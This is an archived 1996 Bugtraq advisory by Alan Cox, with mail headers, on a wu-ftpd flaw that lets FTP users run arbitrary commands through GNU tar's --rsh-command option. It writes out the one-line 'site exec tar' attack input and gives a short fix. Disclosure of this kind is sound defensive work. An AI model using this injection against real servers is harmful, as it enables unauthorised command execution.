From proff Tue Aug 20 10:06:30 1996 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id KAA28528 for best-of-security; Tue, 20 Aug 1996 10:06:30 +1000 Received: from brimstone.netspace.org ([128.148.157.143]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id EAA15265 for ; Tue, 20 Aug 1996 04:47:11 +1000 Received: from netspace.org ([128.148.157.6]) by brimstone.netspace.org with ESMTP id <26306-16246>; Mon, 19 Aug 1996 14:45:17 -0500 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id OAA10112; Mon, 19 Aug 1996 14:37:21 -0400 Received: from NETSPACE.ORG by NETSPACE.ORG (LISTSERV-TCP/IP release 1.8b) with spool id 281902 for BUGTRAQ@NETSPACE.ORG; Mon, 19 Aug 1996 14:34:55 -0400 Received: from netspace.org (netspace [128.148.157.6]) by netspace.org (8.7/8.6.12) with SMTP id OAA09102 for ; Mon, 19 Aug 1996 14:29:47 -0400 Approved-By: ALEPH1@UNDERGROUND.ORG Received: from pluto.private.cableol.net (pluto.cableol.net [194.168.50.1]) by netspace.org (8.7/8.6.12) with SMTP id JAA12010 for ; Mon, 19 Aug 1996 09:12:09 -0400 Received: from [10.144.1.245] by pluto.private.cableol.net; (5.65v3.2/1.1.8.2/19Mar96-0213PM) id AA16648; Mon, 19 Aug 1996 14:11:51 +0100 Received: (from coxa@localhost) by cableol.net (8.7.4/8.7.3) id OAA18348 for bugtraq@netspace.org; Mon, 19 Aug 1996 14:09:19 +0100 Content-Type: text Approved-By: Alan Cox Message-ID: <199608191309.OAA18348@cableol.net> Date: Mon, 19 Aug 1996 14:09:19 +0100 Reply-To: Bugtraq List Sender: proff From: Alan Cox Subject: WU.FTPD vulnerability: gnu tar possibly others To: Multiple recipients of list BUGTRAQ quote site exec tar -c -v --rsh-command=commandtorunasftp -f somebox:foo foo Gnu tar allows you to specify which binary you wish to run. Fix: Use a dumber tar. Also carefully evaluate any other binaries you have to avoid unpleasant and similar suprises.